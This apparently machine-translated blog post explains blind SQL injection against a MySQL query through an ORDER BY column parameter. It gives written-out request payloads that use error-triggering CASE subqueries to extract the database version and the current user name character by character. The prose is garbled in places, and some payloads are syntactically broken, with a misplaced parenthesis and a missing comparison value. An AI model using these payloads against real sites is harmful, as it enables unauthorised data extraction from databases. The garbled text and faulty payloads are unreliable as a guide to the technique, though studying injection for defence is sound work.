MySQL blind Injection

The original Article should have been deleted as required. Later I thought it was necessary for me to record it, but it was no longer similar to the previous practice or live broadcast with illustrations, and I did not nominate registration. It is not easy to update a blog!
 
An injection point receives the following parameters:
Category = 4 & limit1 = 0 & limit2 = 1 & order = desc & orderColumn = 1
Based on these parameters, you can guess the SQL statement as follows:
 
SELECT * FROM iNeeke WHERE category = 4 order by 1 desc limit 0;
Generally, "category = 4 and where 1 = 2 union select…" is used for injection ..." Or "limit 0, 1 union select ..." But from the preceding SQL statement, the latter does not work, because "union" cannot appear after "order by", and the category parameter is also filtered, that won't work.
Now we can only work on the orderColumn parameter. It cannot change the query result, but we can find a way to query it successfully or make a query error, so that we can ignore it blindly, for more information, see the article www.2cto.com/Article/201004/46707.html.
Then start assembling SQL:
Check version:
Category = 4 & limit1 = 0 & limit2 = 1 & order = desc & orderColumn = 1, (select case when (select substring (version (), 1, 1)> 5) then 1 else 1 * (select 1 union select 2) end) = 1
Query the length of the current MySQL user name:
Category = 4 & limit1 = 0 & limit2 = 1 & order = desc & orderColumn = 1, (select case when (select length (user ()> 10) then 1 else 1 * (select 1 union select 2) end) = 1
Query the first character of the current MySQL user name:
Category = 4 & limit1 = 0 & limit2 = 1 & order = desc & orderColumn = 1, (select case when (select ascii (substring (user (), 120) =) then 1 else 1 * (select 1 union select 2) end) = 1
Similarly, what database name indicates that fields and data can be obtained, but manual blind injection is too tiring...
That's all, but I feel that this thing can be further studied.
 
Http://www.ineeke.com/